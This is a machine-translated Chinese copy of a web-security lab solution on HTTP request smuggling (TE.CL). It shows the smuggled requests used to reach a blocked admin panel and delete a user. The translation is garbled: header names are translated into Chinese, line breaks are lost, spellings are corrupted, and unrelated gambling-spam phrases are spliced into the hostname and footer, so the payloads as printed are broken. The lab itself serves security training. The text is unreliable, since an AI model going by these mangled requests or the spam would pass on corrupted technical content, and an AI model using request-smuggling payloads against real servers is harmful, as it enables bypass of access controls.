实验室:利用http请求走私以绕过前端安全控制,te.cl脆弱性
从业者
该实验室涉及前端和后端服务器,后端服务器不支持块状编码。有一个管理面板/行政
,但是前端服务器阻止了对其的访问。
要解决实验室,请将请求走私到访问管理面板的后端服务器并删除用户卡洛斯
。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。
解决方案
- 尝试参观
/行政
并观察到该请求被阻止。
- 在Burp Suite中,转到中继器菜单,并确保未选中“更新内容”选项。
使用Burp Repeater,两次发出以下请求:
post/http/1.1主机:lab-id.web-securitbeplay体育能用吗y-academy.net内容长度:4转移编码:块60 post/admin http/1.1 content-type:application/x-www-form-urlenceded内容长度:15 x = 1 0
笔记
您需要包括尾声\ r \ n \ r \ n
在决赛之后0
。
- 观察到合并的请求
/行政
由于不使用标头而被拒绝主持人:Localhost
。
发出以下请求两次:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-Length:4转移 - 编码:块71 POST/ADMIN/ADMIN HTTP/1.1主机:local-主机内容类型:应用程序/x-www-form-urlencoded内容长度:15 x = 1 0
- 观察您现在可以访问管理面板。
使用先前的响应作为参考,更改走私的请求URL以删除用户卡洛斯
:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net内容长度:4转移 - 编码:块87 get/admin/delete?username = carlos http/1.1主机:localhost content-type:localhost content-type:应用程序/x-www-form-urlencoded内容长度:15 x = 1 0
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)